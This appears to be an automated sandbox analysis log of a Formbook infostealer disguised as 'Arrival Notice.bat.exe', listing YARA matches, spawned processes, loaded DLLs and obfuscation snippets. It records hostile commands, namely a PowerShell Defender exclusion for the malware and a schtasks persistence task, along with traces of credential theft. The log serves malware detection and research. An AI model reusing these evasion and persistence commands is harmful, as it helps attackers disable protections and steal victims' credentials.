              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: String function: 015C7E54 appears 110 times
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: String function: 015FF290 appears 103 times
              Source: Arrival Notice.bat.exe, 00000000.00000002.1736485863.0000000008160000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1728793869.0000000005FE0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1706016711.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1708194861.00000000041C7000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.000000000166D000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, Binary or memory string: OriginalFilenametZby.exe. vs Arrival Notice.bat.exe
              Source: Arrival Notice.bat.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              The rule above matched in each of the following sources:
              Source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Arrival Notice.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: dLrZsz.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: OdR8akYyHwr3ISR[1].exe.18.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: -6qxw.exe.18.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, Kk6SHmInle3YHeKsC7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, Kk6SHmInle3YHeKsC7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.AddAccessRule
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, Kk6SHmInle3YHeKsC7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.AddAccessRule
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.SetAccessControl
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.cs | Security API names: _0020.AddAccessRule
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@33/20@22/16
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | File created: C:\Users\user\AppData\Roaming\dLrZsz.exe
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe | Mutant created: \Sessions\1\BaseNamedObjects\eSfeoiHugYzpJoxQBiDYFsD
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe | Mutant created: \Sessions\1\BaseNamedObjects\xTYvbBQtfRIAFDeihCxunVmrp
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | File created: C:\Users\user\AppData\Local\Temp\tmp4908.tmp
              Source: Arrival Notice.bat.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: compact.exe, 00000012.00000003.2231241185.00000000025B4000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2231355425.00000000025D5000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4143560755.00000000025D5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694768813.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694700127.00000000009E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Arrival Notice.bat.exe | ReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | File read: C:\Users\user\Desktop\Arrival Notice.bat.exe:Zone.Identifier
              Source: unknown | Process created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe | Process created: C:\Users\user\Desktop\Arrival Notice.bat.exe "C:\Users\user\Desktop\Arrival Notice.bat.exe"
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\dLrZsz.exe C:\Users\user\AppData\Roaming\dLrZsz.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe | Process created: C:\Users\user\AppData\Roaming\dLrZsz.exe "C:\Users\user\AppData\Roaming\dLrZsz.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe | Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
              Source: C:\Windows\SysWOW64\compact.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exe | Process created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe | Process created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe | Process created: C:\Users\user\AppData\Local\Temp\-6qxw.exe "C:\Users\user\AppData\Local\Temp\-6qxw.exe"
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe | Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\compact.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: Arrival Notice.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Arrival Notice.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Arrival Notice.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: compact.pdbGCTL source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929042944.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000000.2071219488.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000000.3388459052.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000000.3532932698.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: runonce.pdbGCTL source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tZby.pdb source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: wntdll.pdbUGP source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdbSHA256$ source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: Binary string: wntdll.pdb source: Arrival Notice.bat.exe, Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: tZby.pdbSHA2562 source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: compact.pdb source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: runonce.pdb source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdb source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr

              Data Obfuscation

              Source: Arrival Notice.bat.exe, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
              Source: dLrZsz.exe.0.dr, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, Login.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Inventory_Management"}}, (string[])null, (bool[])null)
              Source: -6qxw.exe.18.dr, Login.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Inventory_Management"}}, (string[])null, (bool[])null)
              Source: 0.2.Arrival Notice.bat.exe.43e3100.0.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.8160000.5.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.435eee0.1.raw.unpack, gp4U7sEhP5rusid8QZ.cs.Net Code: SQp6lDomKw System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Arrival Notice.bat.exe.5fe0000.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, Login.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: -6qxw.exe.18.dr, Login.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
              Source: Arrival Notice.bat.exeStatic PE information: 0xC0621386 [Tue Apr 12 02:16:38 2072 UTC]
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_0822BBB5 push FFFFFF8Bh; iretd 0_2_0822BBB7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00418141 push eax; ret 8_2_00418149
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00407954 push esp; retf 8_2_00407956
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_004021C8 push 9A9BCBBFh; retf 8_2_004021CD
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0041426D push esp; iretd 8_2_0041426E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00407A02 push esp; retf 8_2_00407A07
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0041E303 push edi; iretd 8_2_0041E33C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00418421 push esp; iretd 8_2_0041843F
